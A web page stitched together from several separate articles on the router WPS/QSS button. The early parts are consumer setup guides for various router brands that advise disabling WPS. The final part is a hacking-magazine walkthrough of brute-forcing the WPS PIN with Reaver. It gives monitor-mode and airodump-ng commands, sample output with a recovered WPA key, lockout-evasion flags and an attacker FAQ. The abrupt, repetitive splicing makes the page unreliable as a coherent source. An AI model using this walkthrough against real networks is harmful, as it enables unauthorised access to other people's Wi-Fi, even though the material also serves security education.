• home
  •  > 
  • Graphics and design
  •  > 
  • WPS on a router - let’s figure out what it is? WPS button on the Router - What is it and How to Configure QSS or EZSetup.

WPS on a router - let’s figure out what it is? WPS button on the Router - What is it and How to Configure QSS or EZSetup.

Surely many of you have paid attention to one strange, inconspicuous WPS button on the router. What is it anyway, what does it mean and what is it for? By the way, WPS is not the only abbreviation that denotes this function. For example, TP-Link calls it QSS, and older Asus calls it EZSetup.

Wireless WPS technology, or “Wi-Fi Protected Setup,” is a function that automatically configures the connection between the router and a device that connects to WiFi.

It is present on all modern models of WiFi routers. It can also be found on a wifi adapter or printer equipped with a wireless module. The WPS button, which is often combined with the Reset function, can be very useful when connecting various gadgets.

The essence of the technology is that the router generates an encrypted signal with information about the wireless network settings, which is received wirelessly by the connecting adapter.

QSS button on TP-LINK

Until recently, TP-LINK used its own name on its routers “ QSS"(Quick Security Setup). Therefore, there is no point in asking where the WPS button is on routers from this company that were released several years ago.

But new TP-Link models also use the common name “WPS”. And ASUS routers used to use another abbreviation - “ EZSetup«.

What is the WPS-Reset button on the router for?

Actually, the WPS/Reset button on the router or any other device activates this function.

For example, you bought a USB adapter and want to connect a laptop or computer to your router. But you don’t know exactly how to properly configure it to connect to the network. Either you just don’t know how yet, or you simply don’t have a WiFi password, and access to the admin panel of the router is closed.


Then the WPS function will help us, provided that this technology is supported by the router and adapter. It's easy to find out about this. Both devices must have a corresponding WPS button on their body to activate this mode.

In exactly the same way, you can connect other wireless devices that support Wi-Fi Protected Setup to the router - TV, IP cameras, wifi amplifiers, storage devices, etc.

How to connect a WiFi adapter to a router via WPS-QSS?

The easiest way is when a WPS or QSS button is clearly physically present on both the router and the connected adapter.

Accordingly, to activate the Wireless Protected Setup function, simultaneously press this key on the router and wifi adapter for a few seconds. And we wait until the indicator lights blink, indicating that a connection has been established between them.

If the WPS button is combined with RESET, then a short press activates the connection mode. And for a long time - reset settings! Do not overexpose it, otherwise the router will reset.

However, if it is not there, this does not mean that the technology is not supported. Less common, but the following cases occur:



WPS button in Zyxel Keenetic

First, you need to decide whether WPS mode is enabled on the router (if, of course, you have access to the admin panel). This is what this setting looks like on the Zyxel Keenetic router (menu section “WiFi”)

In the new Keenetic admin panel, you can enter the configuration we need right from the start screen

And here click on “Start WPS”

WPS-Reset button on the TP-LINK router (QSS Function)

On a TP-LINK router, the WPS button on many models is often combined with the Reset function. In this case, a short press activates WPS, and a long press resets the settings.

If it is not on the case, then we look for enabling this mode in the settings. See what it looks like in the admin panel

In earlier versions it was referred to as QSS. But today the manufacturer has come to a generally accepted terminology and calls it the same as everyone else.

WPS on Asus router - EzSetup program

The WPS function is also available on Asus routers. Here's the button:

And here is a screenshot of enabling WPS from the control panel. Please note that you can also set your own PIN if you wish.

If you have an older model, you will most likely see a program like EzSetup instead of WPS. This button launches this application for quick configuration.

WPS in Netis router

Same thing on Netis

By the way, on the Netis router, as we see, you can also connect any device via WPS with a password in the opposite direction, that is, when the password is set on the gadget itself and then entered in the router admin panel. Sometimes this is also necessary.

How does WPS work on D-Link?

And this is what the WPS configuration panel looks like on a D-Link router

So, let's activate this mode and apply the changes.

After this, we find the WPS button on the router and on the second device and briefly press them at the same time - the signal exchange will take only a few seconds, so they need to work at the same time.

The WPS button is often combined with the “Reset” reset function, so you need to press and release immediately - holding it for a long time will lead to a complete reset and reboot.

WPS button on wifi adapter and repeater

Now I’ll give you a few examples from other gadgets. This is what the WPS button on a wifi adapter might look like

And here it is on the Edimax adapter

In the next photo we will see a similar key on the body of the signal amplifier

How to connect to WiFi via WPS from a Windows 10 computer?

Let's now connect a laptop or computer running Windows 10 to the router using WPS technology. By the way, everything works exactly the same on Windows 7, the only difference will be in the visual display.

So, click on the WiFi icon in the Windows panel and find your network in the list

We see that to connect you can either enter a password or use WPS technology. In this case, of course, the mode must be active on the router. I already wrote above about how to check this.

Now we briefly press the mechanical QSS (or WPS) button on the router, after which the laptop will connect to WiFi itself.

Finally, I would like to note that if WPS is always turned on on a WiFi router, there is a risk of your network being hacked by bad people. For example, through the WPS Connect mobile program. Therefore, after you have connected your gadget, turn off WPS/QSS in the router admin panel.

How to disable WPS on a router?

Accordingly, in order to disable WPS on the router, you must also go to its panel and deactivate this function. The setting is located in the same place where I showed it, where it turns on. On each model this section is designated differently.

The abbreviation WPS on a router is an abbreviation for “Wi-Fi Protected Setup”. The technology was created to simplify the connection of various devices to the network. It is supported by almost all routers. Its main advantage is that you don’t have to enter a password on your phone or laptop to connect. This is especially true when you have forgotten your Wi-Fi password, and it is not possible to look in the router settings. The article will describe in detail the functioning of this technology, as well as provide instructions for its use.

How WPS mode works

Now that we have found out what WPS is, it is worth talking about the algorithm of this technology. To create a wireless network, the user needs to configure the router's access point and connect to the local network of their device by entering a security password.

WPS greatly simplifies this procedure. The controller generates a random password automatically and then transmits it to the device that connects to the network via Wi-Fi Protected Setup. Thanks to this, you do not have to independently search for your network among others and manually enter the password

The WPS protocol is supported by Windows operating systems and most mobile gadgets running Android OS. On those operating systems that do not have built-in utilities, you can download a special driver that expands the functionality of the system.

Using WPS (QSS) on a router

You can connect devices to the router using WPS either hardware or software. It all depends on the gadget you connect to the wireless network.

Hardware connection: what is it and how is it used

The first option involves only two actions: you need to press the buttons with the corresponding designation on the router and on the connected gadget. The WPS button on a router is usually located on the back panel of the device.

In some cases, the button is combined with the reset function (RESET). If you do not want to reset the router to factory settings, do not hold it for more than 5 seconds. The corresponding light indicator on the front panel of the router will notify you that the WPS function is activated.

Software connection of mobile phone/tablet

The Android operating system includes a connection function via WPS. To use it, follow the instructions below, namely:


If everything is done correctly, the smartphone will connect to your local network.

Connecting a Windows device

You can use Wi-Fi on your laptop after establishing a connection with the router via WPS. To do this, you need to follow several steps:

If you need to disable this protocol on routers, simply press the button (if it is not there, you can only disable WPS on the router through the settings).

What to do if there is no WPS button on the router: examples of activation

Many models do not provide hardware enablement of the Wi-Fi Protected Setup protocol. This means that the connection occurs through the WEB interface. To do this you need to do the following:


After completing these manipulations, you will be able to use Wi-Fi without any problems. Often the eight-digit PIN combination is indicated on a sticker that is attached to the modem case.

There is an alternative option for connecting mobile devices:


When you enter the correct combination, your mobile phone or tablet will be connected to the network. This function allows you to connect any devices that support this protocol to Wi-Fi.

How to disable WPS through settings

To deactivate, you need to click the “Disable” button in the corresponding section of the router or select the Disabled item.

Hello! I decided to talk about technology today WPS (QSS) , I’ll tell you the same thing What is the QSS button for on a Wi-Fi router? and how to put it into practice. It seems to me that now all modern routers have WPS (QSS) technology, so the information is relevant. In my TL-WR841N router, and in TP-Link routers in general, this function is called QSS.

QSS, or WPS, is a technology that allows you to semi-automatically create a wireless Wi-Fi connection between your router and the device you want to connect to the network.

Deciphered as:

WPS – Wi-Fi Protected Setup
QSS – Quick Security Setup

Now I’m describing it in my own words. For example, guests come to you and they want to connect to your Wi-Fi network. What do you usually do? Look for your Wi-Fi password, then you need to enter it on the device and that’s the only way to connect. And QSS technology simplifies this procedure.

You simply find your network on the device, select WPS in the additional settings and press the “Puch button” (I have this on my phone), then click connect, and on the router press the button QSS. The devices exchange a PIN code and connect to each other. As you can see, everything is convenient, you don’t need to enter anything. I checked it myself, everything works fine.

Now I will write in more detail:

  • How to enable (disable) QSS on a TP-Link router.
  • How to connect a device (phone) to a Wi-Fi router using QSS technology
  • What are the dangers of using WPS (QSS) technology?

How to enable/disable QSS on a TP-Link router?

When I wrote an article on setting up, I mentioned the QSS button, on this router it looks like this:

Right away, before I forget, I want to give an answer to those who ask: if I click on this QSS button, does that mean that everyone will be able to connect to my router? The answer is no, this button only works when you press it, and for some time after pressing it (not for long), and at that moment you connect your phone or tablet. The process of connecting and exchanging a PIN code takes just a few seconds.

The QSS function can be enabled or disabled in the router settings. Immediately after setting up the router, this technology was enabled for me, and it still works. In order to enable or disable the QSS protocol, or generate a new PIN code, as well as to add a new device from the router control panel, you need to go to the router settings.

I have already written several times how to do this, type the address 192.168.1.1 in the browser address bar, enter the login and password to access the settings (admin and admin by default) and confirm the login.

Then on the left go to the “QSS” tab, the page will open “QSS (Quick Secure Setup)”. If you have the opposite QSS Status: Enabled, it means the technology is enabled, to disable QSS, click the “Disable QSS” button. And accordingly, if it is disabled, then to enable it you need to press the “Enabled” button.

How to connect a device to a Wi-Fi router using QSS technology?

I will show you the process of connecting to a router using QSS technology, using the WR841N router and HTC One V phone as an example.

We turn on Wi-Fi on the phone and wait until our network appears in the list. We click on it, and the phone will immediately prompt us to enter a password. But we choose “Advanced options”, then “WPS” and “Push” button. At this moment, hold down the QSS button on the router, and on the phone click “Connect”. That’s all, the phone will connect to the router, you can release the button on the router.

What are the dangers of using WPS (QSS) technology?

There are vulnerabilities, friends, and there is a danger that your network will be hacked via QSS. In principle, it is impossible to completely protect your Wi-Fi network, but enabling QSS only increases the risk of hacking.

And my advice to you is that if you rarely connect new devices to your router, then it’s better to disable the QSS protocol, you practically don’t need it. Well, if you often connect new devices, then use QSS and don’t think about the bad things :), sometimes. If you are comfortable with this technology, then you should not give it up. Good luck!

Also on the site:

What are QSS and WPS? What is the QSS button for on a Wi-Fi router and how to use it? updated: March 3, 2014 by: admin

If the Wi-Fi router or access point has a WPS button, then in this case the user will not be required to set up a wireless network. By pressing the WPS button on the router for 3-5 seconds, and then on the Wi-Fi adapter of the subscriber device, we will receive a connection between the device and the router.

The network name cannot be changed, and the password value is generated randomly. We'll look at another method that allows you to set the values ​​yourself. The way the user requires.

WPS button on the router

But first, let’s list what exactly is required for the method discussed above. Firstly, the WPS button must be present on the router. A similar option must be present in the subscriber device (“button” can be hardware or software).

Also, the “WPS” option in the router must be enabled. Configuration of this class of devices is usually done from the web interface. We will look at an example (how to enable WPS in TP-Link routers).

And one last thing. On many models of wireless routers, the WPS button is combined with the reset button. This follows the rule that we give below.

It is important to know: when pressing the WPS button on the router, you can hold it for no more than 5 seconds. Otherwise, we will get a “hard reset” of the settings, and nothing more.

Different connection methods using WPS

PBC, or push button connect

Actually, this method has already been discussed.

The sequence of actions is as follows:

  1. Pressing the WPS button on the router (you need to hold it for 3-5 seconds, then release).
  2. Pressing the WPS button on the subscriber device (it is enough to hold the button for 2-3 seconds).
  3. After about a minute, the device will connect to the wireless network.

But here are the disadvantages of this method, which is very simple at first glance. See how the resulting Wi-Fi password (“created” by the devices themselves) looks like:

Result of creating a connection using the PCB method

Note that between steps “1” and “2” no more than 1 minute should pass.

Connecting using the router PIN code

This method only works on Windows 7 or Vista with a second SP.

When the router boots up completely (a minute after turning it on), you need to look for a Wi-Fi network with the appropriate name. An example for Tenda routers is considered:

Network search

Opposite the required network there will be a checkbox “Connect automatically” and a “Connect” button (click it).

Since Wi-Fi encryption is not configured in the router, the system will prompt you to create and set a password (and at the same time a new network name). Click the “OK” button and follow the instructions of the “wizard”:

Start setting up

First of all, you will need to provide the PIN code of the router (the value can be found on the sticker located on the bottom of the case). Then, come up with a name and password, and select the encryption method:

WPS Network Setup Wizard

By clicking “Close”, we get a wireless network available to all subscribers (the network remains with the name and password that were set). In our example: name – “Home_Network”, password – 1fx2-ufge-198g. As you can see, the WPS button on the router is not used in this case.

Happy setup!

Prerequisites for setting up a network via WPS

How the PC network card should be configured

Regardless of the connection method (that is, the algorithm for creating a new network using WPS), the network card in the subscriber device is configured as follows. The device will receive the IP address “automatically”, as well as the DNS address value.

Therefore, the network card is configured for “auto” IP and DNS. Most devices have this setting by default.

How the router should be configured

First of all, the wireless network must be turned on in the router or access point. To use the WPS option, in addition, you need to “allow” the router to use it:

WPS tab

TP-Link wireless routers have a separate tab called “WPS”. Check that the option has been enabled (you can disable it if necessary). By the way, you can set your own PIN code value (by clicking the “Create a new PIN code” button).

It is not necessary to change the PIN code; its value does not affect security. And when connecting using the PCB method, this code is not used (see example in the video):

Not so long ago, it seemed that a wireless network protected using WPA2 technology was quite secure. Finding a simple key to connect is really possible. But if you install a really long key, neither rainbow tables nor even GPU acceleration will help you fix it. But, as it turned out, you can connect to a wireless network without this - by taking advantage of a recently discovered vulnerability in the WPS protocol.

WARNING

All information is presented for educational purposes only. Penetrating into someone else's wireless network can easily be considered a criminal offense. Think with your head.

The price of simplifications

There are fewer and fewer open access points to which you do not need to enter a key to connect at all. It seems that soon they can be listed in the Red Book. If previously a person might not even know that a wireless network can be locked with a key, protecting himself from outside connections, now he is increasingly being told about this possibility. Take, for example, custom firmware that leading providers release for popular router models to simplify setup. You need to specify two things - login/password and... a key to protect the wireless network. More importantly, the hardware manufacturers themselves are trying to make the setup process straightforward. Thus, most modern routers support the WPS (Wi-Fi Protected Setup) mechanism. With its help, the user can set up a secure wireless network in a matter of seconds, without bothering himself at all with the fact that “you need to enable encryption somewhere else and register a WPA key.” I entered the eight-digit symbolic PIN in the system, which is written on the router, and you’re done! And here, hold on tight. In December, two researchers spoke about serious fundamental flaws in the WPS protocol. It's like a back door for any router. It turned out that if WPS is activated at the access point (which, for a moment, is enabled in most routers by default), then you can select a PIN for connection and extract the key for connection in a matter of hours!

How does WPS work?

The idea of ​​the creators of WPS is good. The mechanism automatically sets the network name and encryption. Thus, the user does not need to go into the web interface and deal with complex settings. And you can easily add any device (for example, a laptop) to an already configured network: if you enter the PIN correctly, it will receive all the necessary settings. This is very convenient, which is why all the major players on the market (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) now offer wireless routers with WPS support. Let's look at it in a little more detail.

There are three options for using WPS:

  1. Push-Button-Connect (PBC). The user presses a special button on the router (hardware) and on the computer (software), thereby activating the setup process. We are not interested in this.
  2. Entering a PIN code in the web interface. The user accesses the administrative interface of the router through a browser and enters the eight-digit PIN code written on the device body (Figure 1), after which the setup process occurs. This method is more suitable for the initial configuration of the router, so we will not consider it either.
  3. Entering the PIN code on the user's computer (Figure 2). When connecting to a router, you can open a special WPS session, within which you can configure the router or get existing settings if you enter the PIN code correctly. This is already attractive. No authentication is required to open such a session. Anyone can do this! It turns out that the PIN code is already potentially susceptible to a bruteforce attack. But these are just flowers.

Vulnerability

As I noted earlier, the PIN code consists of eight digits - therefore, there are 10^8 (100,000,000) options to match. However, the number of options can be significantly reduced. The fact is that the last digit of the PIN code is a kind of checksum, which is calculated based on the first seven digits. As a result, we already get 10^7 (10,000,000) options. But that's not all! Next, we carefully look at the device of the WPS authentication protocol (Figure 3). It feels like it was specially designed to leave room for brute force. It turns out that PIN code verification is carried out in two stages. It is divided into two equal parts, and each part is checked separately! Let's look at the diagram:

  1. If, after sending the M4 message, the attacker received an EAP-NACK in response, then he can be sure that the first part of the PIN code is incorrect.
  2. If he received an EAP-NACK after sending M6, then, accordingly, the second part of the PIN code is incorrect. We get 10^4 (10,000) options for the first half and 10^3 (1,000) for the second. As a result, we have only 11,000 options for a complete search. To better understand how this will work, look at the diagram.
  3. An important point is the possible search speed. It is limited by the speed at which the router processes WPS requests: some access points will produce results every second, others every ten seconds. Most of the time is spent on calculating the public key using the Diffie-Hellman algorithm; it must be generated before step M3. The time spent on this can be reduced by choosing a simple secret key on the client side, which will simplify the calculations of other keys in the future. Practice shows that for a successful result it is usually enough to go through only half of all options, and on average brute force takes only four to ten hours.

First implementation

The first implementation of brute force to appear was the wpscrack utility (goo.gl/9wABj), written by researcher Stefan Viböck in Python. The utility used the Scapy library, which allows you to inject arbitrary network packets. The script can only be run under a Linux system, after first switching the wireless interface to monitoring mode. As parameters, you must specify the name of the network interface in the system, the MAC address of the wireless adapter, as well as the MAC address of the access point and its name (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer started trying 00000000 attempt took 0.95 seconds trying 00010009<...>trying 18660005 attempt took 1.08 seconds trying 18670004# found 1st half of PIN attempt took 1.09 seconds trying 18670011 attempt took 1.08 seconds<...>trying 18674095# found 2st half of PIN<...>Network Key: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ras 0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

As you can see, first the first half of the PIN code was selected, then the second, and in the end the program produced a ready-to-use key for connecting to the wireless network. It is difficult to imagine how long it would have taken to find a key of this length (61 characters) with pre-existing tools. However, wpscrack is not the only utility for exploiting the vulnerability, and this is a rather funny moment: at the same time, another researcher, Craig Heffner from Tactical Network Solutions, was working on the same problem. Seeing that a working PoC for implementing an attack appeared on the Internet, he published his Reaver utility. It not only automates the process of selecting the WPS-PIN and extracting the PSK key, but also offers a greater number of settings so that the attack can be carried out against a wide variety of routers. In addition, it supports a much larger number of wireless adapters. We decided to take it as a basis and describe in detail how an attacker can use a vulnerability in the WPS protocol to connect to a secure wireless network.

HOW-TO

As with any other attack on a wireless network, we will need Linux. Here it must be said that Reaver is present in the repository of the well-known BackTrack distribution, which also already includes the necessary drivers for wireless devices. Therefore, we will use it exactly.

Step 0. Prepare the system

On the official website, BackTrack 5 R1 is available for download as a virtual machine under VMware and a bootable ISO image. I recommend the last option. You can simply write the image onto a disc, or you can use the program to make a bootable USB flash drive: one way or another, after booting from such a medium, we will immediately have a system ready for work without any unnecessary problems.

Crash Course on Wi-Fi Hacking

  1. WEP (Wired Equivalent Privacy) The very first technology for protecting a wireless network turned out to be extremely weak. You can hack it literally in a few minutes, using the weaknesses of the RC4 cipher used in it. The main tools here are the airodump-ng sniffer for collecting packets and the aircrack-ng utility, used directly to crack the key. There is also a special tool wesside-ng, which generally hacks all nearby WEP points automatically.
  2. WPA/WPA2 (Wireless Protected Access)

Brute force is the only way to find a key for a closed WPA/WPA2 network (and even then only if there is a dump of the so-called WPA Handshake, which is broadcast when a client connects to an access point).

Brute force can drag on for days, months and years. To increase the efficiency of the search, specialized dictionaries were first used, then rainbow tables were generated, and later utilities appeared that used NVIDIA CUDA and ATI Stream technologies to hardware accelerate the process using the GPU. The tools used are aircrack-ng (brute force using a dictionary), cowpatty (using rainbow tables), pyrit (using a video card).

Step 1: Login

The default login and password is root:toor. Once in the console, you can safely start “X” (there are separate BackTrack assemblies - both with GNOME and KDE):

#startx

Step 2: Install Reaver

To download Reaver, we will need internet. Therefore, we connect the patch cord or configure the wireless adapter (menu “Applications > Internet > Wicd Network Manager”). Next, we launch the terminal emulator, where we download the latest version of the utility through the repository:

# apt-get update # apt-get install reaver

Here I must say that the repository contains version 1.3, which personally did not work correctly for me. After searching for information about the problem, I found a post by the author, who recommends updating to the highest possible version by compiling sources taken from SVN. This is, in general, the most universal installation method (for any distribution).

$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

There will be no problems with assembly under BackTrack - I checked it personally. In the Arch Linux distribution that I use, installation is even simpler, thanks to the presence of the corresponding PKGBUILD:

$ yaourt -S reaver-wps-svn

Step 3. Preparing for brute force

To use Reaver you need to do the following:

  • switch the wireless adapter to monitoring mode;
  • find out the name of the wireless interface;
  • find out the MAC address of the access point (BSSID);
  • make sure that WPS is activated on the point.

First, let's check that the wireless interface is present in the system at all:

#iwconfig

If the output of this command contains an interface with a description (usually wlan0), it means that the system recognized the adapter (if it connected to the wireless network to load Reaver, then it is better to disconnect the connection). Let's put the adapter into monitoring mode:

# airmon-ng start wlan0

This command creates a virtual interface in monitoring mode, its name will be indicated in the command output (usually mon0). Now we need to find the access point to attack and find out its BSSID. Let's use the utility for listening to wireless broadcasts airodump-ng:

#airodump-ngmon0

A list of access points within range will appear on the screen. We are interested in points with WPA/WPA2 encryption and PSK key authentication.

It is better to choose one of the first in the list, since good communication with the point is desirable for carrying out an attack. If there are a lot of points and the list does not fit on the screen, then you can use another well-known utility - kismet, where the interface is more suitable in this regard. Optionally, you can check on site whether the WPS mechanism is enabled at our point. To do this, Reaver comes bundled with (but only if you take it from SVN) the wash utility:

# ./wash -i mon0

The parameter is the name of the interface switched to monitoring mode. You can also use the '-f' option and feed the utility a cap file created, for example, by the same airodump-ng. For some unknown reason, the Reaver package in BackTrack did not include the wash utility. Let's hope this error will be corrected by the time this article is published.

Step 4. Run brute force

Now you can proceed directly to searching your PIN. To start Reaver in the simplest case you don't need much. You just need to specify the name of the interface (which we previously switched to monitoring mode) and the BSSID of the access point:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

The "-vv" switch enables enhanced program output so we can make sure everything works as expected.

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 (ESSID: linksys) [+] Trying pin 63979978

If the program consistently sends PINs to the access point, it means that everything has started well, and all that remains is to wait stupidly. The process may take a long time. The shortest time in which I was able to brute force a PIN was about five hours. As soon as it is selected, the program will happily inform you about it:

[+] Trying pin 64637129 [+] Key cracked in 13654 seconds [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

The most valuable thing here is, of course, the WPA-PSK key, which you can immediately use to connect. Everything is so simple that it doesn’t even fit in your head.

Is it possible to defend yourself?

For now, there is only one way to protect yourself from an attack - disable WPS in the router settings. However, as it turned out, this is not always possible. Since the vulnerability exists not at the implementation level, but at the protocol level, you should not expect a quick patch from manufacturers that would solve all the problems. The most they can do now is to resist brute force as much as possible. For example, if you block WPS for one hour after five unsuccessful attempts to enter the PIN code, then the search will take about 90 days. But another question is, how quickly can such a patch be rolled out to millions of devices operating all over the world?

Upgrading Reaver

In the HOWTO we showed the simplest and most versatile way to use the Reaver utility. However, WPS implementation varies from manufacturer to manufacturer, so in some cases additional configuration is required. Below I will provide additional options that can increase the speed and efficiency of key search.

  1. You can set the channel number and SSID of the access point: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. The '—dh-small' option has a beneficial effect on the brute force speed; it sets a small value for the secret key, thereby facilitating calculations on the access point side: # reaver -i mon0 -b 00:01:02:03:04:05 -vv - -dh-small
  3. The default response timeout is five seconds. If necessary, you can change it: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. The default delay between attempts is one second. It can also be configured: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Some access points may block WPS for a certain time, suspecting that they are being scammed. Reaver notices this situation and pauses the search for 315 seconds by default, the duration of this pause can be changed: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Some implementations of the WPS protocol will terminate the connection if the PIN code is incorrect, although according to the specification they should return a special message. Reaver automatically recognizes this situation, for this there is a ‘—nack’ option: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. The '--eap-terminate' option is intended to work with those APs that require termination of the WPS session using the EAP FAIL message: # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
  8. The occurrence of errors in the WPS session may mean that the AP is limiting the number of attempts to enter a PIN code, or is simply overloaded with requests. Information about this will be displayed on the screen. In this case, Reaver pauses its activity, and the pause time can be set using the '--fail-wait' option: # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

FAQ

Question: What wireless adapter is needed for hacking?

Answer: Before experimenting, you need to make sure that the wireless adapter can operate in monitoring mode. The best way is to check the list of supported hardware on the Aircrack-ng project website. If the question arises about which wireless module to buy, then you can start with any adapter based on the RTL8187L chipset. USB dongles can easily be found on the Internet for $20.

Question: Why do I get "timeout" and "out of order" errors?

Answer: This usually happens due to low signal strength and poor communication with the access point. In addition, the access point may temporarily block the use of WPS.

Question: Why doesn't MAC address spoofing work for me?

Answer: You may spoof the MAC virtual interface mon0, and this will not work. You must specify the name of the real interface, for example, wlan0.

Question: Why does Reaver work poorly when the signal is bad, although the same WEP hacking works fine?

Answer: WEP cracking typically occurs by retransmitting captured packets to obtain more initialization vectors (IVs) needed for a successful crack. In this case, it does not matter whether any packet was lost or somehow damaged along the way. But to attack WPS, you must strictly follow the packet transfer protocol between the access point and Reaver to check each PIN code. And if at the same time some packet is lost or arrives in an indecent form, then you will have to re-establish the WPS session. This makes attacks on WPS much more dependent on signal strength. It is also important to remember that just because your wireless adapter sees an access point, this does not mean that the access point sees you. So if you are the happy owner of a high-power adapter from ALFA Network and an antenna of a couple of tens of dBi, then don’t expect to be able to break all the caught access points.

Question: Reaver always sends the same PIN to the access point, what's the matter?

Answer: Check if WPS is activated on the router. This can be done using the wash utility: run it and check that your target is in the list.

Question: Why can't I associate with an access point?

Answer: This may be due to poor signal strength or because your adapter is unsuitable for such research.

Question: Why do I keep getting “rate limiting detected” errors? Answer: This is because the access point has blocked WPS. Usually this is a temporary block (about five minutes), but in some cases they can impose a permanent ban (unblocking only through the administrative panel). There is one unpleasant bug in Reaver version 1.3, due to which the removal of such locks is not detected. As a workaround, they suggest using the ‘—ignore-locks’ option or downloading the latest version from SVN.

Question: Can I run two or more instances of Reaver simultaneously to speed up my attack?

Answer: Theoretically, it is possible, but if they attack the same access point, the search speed is unlikely to increase, since in this case it is limited by the weak hardware of the access point, which is already fully loaded even with one attacker.